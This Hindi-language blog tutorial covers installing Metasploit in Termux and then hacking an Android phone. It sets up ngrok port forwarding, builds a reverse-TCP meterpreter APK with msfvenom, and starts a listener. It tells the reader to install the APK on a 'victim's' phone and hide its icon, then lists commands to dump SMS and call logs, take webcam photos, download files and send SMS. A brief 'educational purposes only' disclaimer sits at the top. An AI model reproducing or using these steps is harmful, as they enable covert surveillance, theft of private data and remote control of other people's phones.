Metasploit Framework | Updated- 2023 | In Hindi

 मुख पृष्ठ  Termux Tools  Metasploit Framework 

Metasploit Framework

नोट:- यह पोस्ट केवल शैक्षिक उद्देश्य के लिए है। मैं और यह साइट किसी भी आपराधिक गतिविधि का समर्थन नहीं करते हैं। यदि आप इस जानकारी का किसी भी प्रकार का दुरुपयोग कर रहे हैं तो इसके लिए यह साइट जिम्मेदार नहीं है। यह साइट केवल एथिकल हैकिंग का समर्थन करती है। वह भी केवल आवश्यकता अनुसार: [MNSGranth टीम]

मेटास्प्लोइट फ्रेमवर्क

Metasploit सिर्फ एक Termux टूल से कहीं अधिक है। यह हैकिंग उपकरणों का एक संग्रह है, मैं मेटास्प्लोइट को एक बुनियादी ढांचा कहूंगा जिसका उपयोग आप अपने उपकरण बनाने के लिए कर सकते हैं।
यह मुफ्त टूल सूचना सुरक्षा के क्षेत्र में सबसे लोकप्रिय उपकरणों में से एक है, जो आपको विभिन्न प्लेटफार्मों पर कमजोरियों को खोजने की अनुमति देता है।

मेटास्प्लोइट के पास आपके लिए आवश्यक जानकारी प्राप्त करने और आपके सिस्टम में कमजोरियों की पहचान करने में मदद करने के लिए 300,000 से अधिक उपयोगकर्ताओं और कर्मचारियों के लिए समर्थन है।
यह हैकिंग टूलकिट आपको कमजोरियों की पहचान करने के लिए वास्तविक हैकर हमलों का अनुकरण करने की अनुमति देगा।
Metasploit सभी प्रमुख प्लेटफ़ॉर्म पर समर्थित है। साथ ही आप Termux में भी Metasploit इंस्टॉल कर सकते हैं।

टर्मक्स पर Metasploit कैसे स्थापित करें

$ apt update
$ apt upgrade
$ apt install git
$ cd $HOME
$ git clone http://github.com/rooted-cyber/Metasploit-Installation
$ cd Metasploit-Installation
$ termux-setup-storage
$ bash setup.sh
$ bash metasploit.sh

अपना टर्मक्स टूल खोलें और एक-एक करके निम्न कमांड टाइप करें और प्रत्येक कमांड के समाप्त होने की प्रतीक्षा करें।

pkg update && pkg upgrade -y

pkg install unstable-repo

pkg install metasploit

एक-एक करके सभी कमांड टाइप करने के बाद Termux में Metasploit सफलतापूर्वक इंस्टॉल हो जाएगा। Metasploit की सफल स्थापना के बाद टूल को चलाने के लिए निम्न कमांड टाइप करें।

msfconsole

Metasploit के साथ टर्मक्स का उपयोग करके एंड्रॉइड फोन को कैसे हैक करें।

इस पोस्ट में, हम मेटास्प्लोइट के साथ टर्मक्स का उपयोग करके एंड्रॉइड फोन को हैक करने के तरीके के बारे में जानेंगे। आप टर्मक्स ऐप में एक-एक करके कमांड को कॉपी-पेस्ट कर सकते हैं और यह पूरी तरह से काम करेगा।

टर्मक्स में Ngrok का उपयोग करके पोर्ट अग्रेषण:

यदि आप LAN पर Metasploit का उपयोग करना चाहते हैं तो आप इस चरण को छोड़ सकते हैं (यदि आप और आपका शिकार एक ही वाईफाई से जुड़े हैं तो आप इस चरण को छोड़ सकते हैं)।

पोर्ट फ़ॉरवर्डिंग की सहायता से, हम मोबाइल डेटा का उपयोग करके शिकार के फ़ोन तक पहुँच सकते हैं, जिसका अर्थ है कि यदि आप सिमकार्ड का उपयोग कर रहे हैं तो आपको मेटास्प्लोइट का उपयोग करने के लिए पोर्ट फ़ॉरवर्डिंग करना होगा।

स्टेप 1:
Ngrok.com पर जाएं और एक खाता बनाएं। अगर आपका पहले से ही Ngrok पर अकाउंट है तो लॉग इन करें।

स्टेप 2:
अपने फ़ोन पर Ngrok ज़िप फ़ाइल डाउनलोड करें। यह लगभग 12Mb फ़ाइल होगी।

स्टेप 3:
अब आपको एक ज़िप फ़ाइल दिखाई देगी जिसे आपने Ngrok वेबसाइट से डाउनलोड किया है।
टर्मक्स खोलें और उस ज़िप फ़ाइल पर नेविगेट करें। अगर यह आपके डाउनलोड फ़ोल्डर में नहीं है या आप अपना डाउनलोड फ़ोल्डर नहीं देख पा रहे हैं, तो बस फ़ाइल प्रबंधक खोलें और ज़िप फ़ाइल को अपने आंतरिक संग्रहण में पेस्ट करें। और टर्मक्स और सीडी स्टोरेज पर जाएं।

स्टेप 4:
टर्मक्स के अपने होम डायरेक्टरी में जिप फाइल को कॉपी करने के लिए इस कमांड को टाइप करें।

cp ngrok-stable-linux-arm.zip /$HOME

स्टेप 5:
अपने होम डायरेक्टरी में वापस जाने के लिए यह कमांड टाइप करें।

cd /$HOME

स्टेप 6:
फ़ाइल को अनज़िप करने के लिए यह कमांड टाइप करें।

unzip ngrok-stable-linux-arm.zip

स्टेप 7:
फिर से Ngrok साइट पर जाएं और टोकन को कॉपी करें, (कृपया पूरा टोकन कॉपी करें)

स्टेप 8:
टर्मिनल खोलें और यह कोड टाइप करें और अपना टोकन पेस्ट करें और एंटर दबाएं।

./ngrok authtoken

स्टेप 9:
पोर्ट 1275 पर पोर्ट फ़ॉरवर्डिंग शुरू करने के लिए यह कमांड टाइप करें।

./ngrok tcp 1275

आप किसी भी पोर्ट नंबर का उपयोग कर सकते हैं जो मैं यहां 1275 का उपयोग कर रहा हूं।

स्टेप 10:
यदि आपको भी यह त्रुटि हो रही है तो बस अपना हॉटस्पॉट खोलें और इसे 30 से 60 सेकंड में ठीक कर दिया जाएगा।

Metasploit में पेलोड बनाएं:

पेलोड एक एपीके फाइल होगी जिसे हम शिकार के फोन पर इंस्टॉल करने जा रहे हैं। यह हमें शिकार के एंड्रॉइड फोन को एक्सेस करने की अनुमति देगा।

स्टेप 1:
टर्मक्स में एक नया सत्र खोलें (बस अपनी स्क्रीन को बाएं से दाएं स्वाइप करें और नए सत्र पर क्लिक करें)। कृपया सुनिश्चित करें कि टर्मक्स के पास भंडारण की अनुमति है। यदि आपके पास संग्रहण अनुमति नहीं है तो नीचे दिए गए आदेश टाइप करें।

termux-setup-storage

स्टोरेज की अनुमति दें।

स्टेप 2:
पेलोड बनाने के लिए यह कमांड टाइप करें और एंटर दबाएं।

कृपया अपना LHOST और LPORT बदलें जैसा कि नीचे दिया गया है।

msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk

स्टेप 3:
अपने इंटरनल स्टोरेज में जाएं और आपको Android.apk दिखाई देगा।
विक्टिम के फोन में इस एपीके को इंस्टॉल करें।

श्रोता प्रारंभ करें (msfconsole):

स्टेप 1:
Msfconsole शुरू करने के लिए इस कमांड को टर्मक्स विंडो में टाइप करें।

msfconsole

इसे शुरू होने में 30 सेकंड तक का समय लग सकता है।

स्टेप 2:
Metasploit में मल्टी हैंडलर शुरू करने के लिए यह कमांड टाइप करें।

use exploit/multi/handler

स्टेप 3:
पेलोड सेट करने के लिए यह कमांड टाइप करें।

 set payload android/meterpreter/reverse_tcp

स्टेप 4:
अब LHOST सेट करें जिस पर आप सत्र सुनना चाहते हैं।
यदि आप ngrok पोर्ट फ़ॉरवर्डिंग का उपयोग कर रहे हैं तो यह IP पता दर्ज करें लेकिन यदि आप पोर्ट फ़ॉरवर्डिंग का उपयोग नहीं कर रहे हैं तो अपना स्थानीय IP दर्ज करें।

set LHOST 127.0.0.1

स्टेप 5:
अब एलपोर्ट सेट करें।
यदि आप Ngrok का उपयोग कर रहे हैं तो उसी पोर्ट को सेट करें जिसका उपयोग आपने पोर्ट फ़ॉरवर्डिंग करते समय किया था।
यदि आप पोर्ट फ़ॉरवर्डिंग का उपयोग नहीं कर रहे हैं तो बस उसी पोर्ट को दर्ज करें जिसका उपयोग आपने पेलोड बनाने के लिए किया था।

set LPORT 1275

स्टेप 6:
यह आखिरी कमांड है और फोन हैक हो जाएगा।

exploit

यह शिकार से जुड़ेगा और आपको मीटरप्रेटर सेशन देगा।

मीटरप्रेटर में कुछ उपयोगी कमांड।

उपलब्ध सभी कमांड खोजें:
यह आदेश आपको आदेशों की एक सूची और उस आदेश का संक्षिप्त विवरण देगा।

help

शिकार के फ़ोन से अपने फ़ोन पर SMS प्राप्त करें:
यह कमांड आपको विक्टिम के फोन से नवीनतम 50 एसएमएस देगा।

dump_sms

आपको एक टेक्स्ट फ़ाइल मिलेगी जिसमें विवरण के साथ सभी एसएमएस होंगे फ़ाइल को खोलने के लिए बस कैट कमांड का उपयोग करें।

शिकार को आपके द्वारा भेजे गए एपीके का आइकन छुपाएं:
यदि आप शिकार के फोन पर ऐप इंस्टॉल कर रहे हैं तो यह स्पष्ट है कि शिकार व्यक्ति को यह पता चल जाएगा कि यह कोई अन्प ऐप है और शिकार ऐप को अनइंस्टॉल कर देगा। नीचे दिए गए आदेश का उपयोग करके आप शिकार के फोन से ऐप आइकन छुपा सकते हैं।

Hide_app_icon

शिकार के फोन का ऑडियो मोड बदलें: आप नीचे दिए गए कमांड का उपयोग करके फोन को सामान्य मोड पर सेट कर सकते हैं।

set_audio_mode -m 1

फोन को साइलेंट करने के लिए आप यह टाइप कर सकते हैं।

set_audio_mode -m 0

शिकार के फोन से लें तस्वीरें :
यह कमांड शिकार के कैमरे से एक फोटो खींचेगा और आपके स्टोरेज फोल्डर में भेज देगा।

webcam_snap

शिकार के फ़ाइल संग्रहण तक पहुंचें:
आप शिकार के फ़ाइल पर नेविगेट कर सकते हैं और किसी भी फ़ोल्डर में सभी डेटा देख सकते हैं।

 cd /sdcard

आप निर्देशिका दिखाने के लिए ls कमांड टाइप कर सकते हैं यदि आप टर्मक्स के मूल आदेशों के बारे में जानना चाहते हैं तो इस पोस्ट को पढ़ें। Termux Tools In Hindi

शिकार के फोन से कोई भी फाइल डाउनलोड करें: उस फाइल पर नेविगेट करें जिसे आप डाउनलोड करना चाहते हैं और यह कमांड टाइप करें

download file-name

Metasploit का उपयोग करके रिमोट एंड्रॉइड फोन का कॉल लॉग, एसएमएस, कैमरा हैक करें

इस लेख में, हम सीखेंगे कि एंड्रॉइड डिवाइस को कैसे हैक किया जाए और किसी की इच्छा के अनुसार उसका शोषण किया जाए। Android एक ऑपरेटिंग सिस्टम है जो Linux कर्नेल पर आधारित है। यह किसी भी एप्लिकेशन को इंस्टॉल करने के लिए एपीके फ़ाइल प्रारूप का उपयोग करता है। इसलिए, हमारा मैलवेयर भी एपीके फॉर्मेट में होगा। मैलवेयर बनाने के लिए निम्नलिखित msfvenom कमांड का उपयोग करें:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 > shell.apk

जैसे ही msfvenom मैलवेयर बनाया जाता है, सत्र शुरू करने के लिए और इस प्रकार के लिए हैंडलर शुरू करें:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.109
set lport 1234
exploit

एक बार हैकिंग को अंजाम देने के बाद, शिकार को एपीके फ़ाइल भेजें और फ़ाइल को अपने एंड्रॉइड फोन में चलाना सुनिश्चित करें। जैसे ही उक्त फ़ाइल चलेगी, आपके पास एक सत्र होगा।

आप निम्न कमांड का उपयोग करके जांच सकते हैं कि डिवाइस रूट है या नहीं:

check_root

आप निम्न आदेश का उपयोग करके सभी कॉल-लॉग को डंप भी कर सकते हैं;

dump_calllog

उपरोक्त आदेश कॉल लॉग की सभी विस्तृत सूची के साथ एक TXT फ़ाइल उत्पन्न करेगा। इसकी सामग्री को पढ़ने के लिए निम्न आदेश का प्रयोग करें:

cat <text file name>

आप डिवाइस से किसी भी प्रकार का एसएमएस भी भेज सकते हैं, पुनः मोटे तौर पर, निम्न आदेश के साथ:

send_sms -d 95******** -t hacked

आप चित्र कैप्चर करने के लिए निम्न आदेश का उपयोग भी कर सकते हैं:

webcam_snap

यह चित्र को JPEG फ़ाइल में सहेज लेगा।

कॉल लॉग को डंप करने के समान, आप सभी एसएमएस को निम्नलिखित कमांड से डंप भी कर सकते हैं:

dump_sms

और फिर आप कैट कमांड का उपयोग करके एसएमएस डंप फ़ाइल पढ़ सकते हैं।

इस तरह, आप अपनी पसंद के अनुसार एंड्रॉइड को हैक कर सकते हैं।

Other Top Hacking Story:
How To Use Termux In Hindi
How To Protect Your Termux With MNSLock
Termux Tools In Hindi

मुख पृष्ठ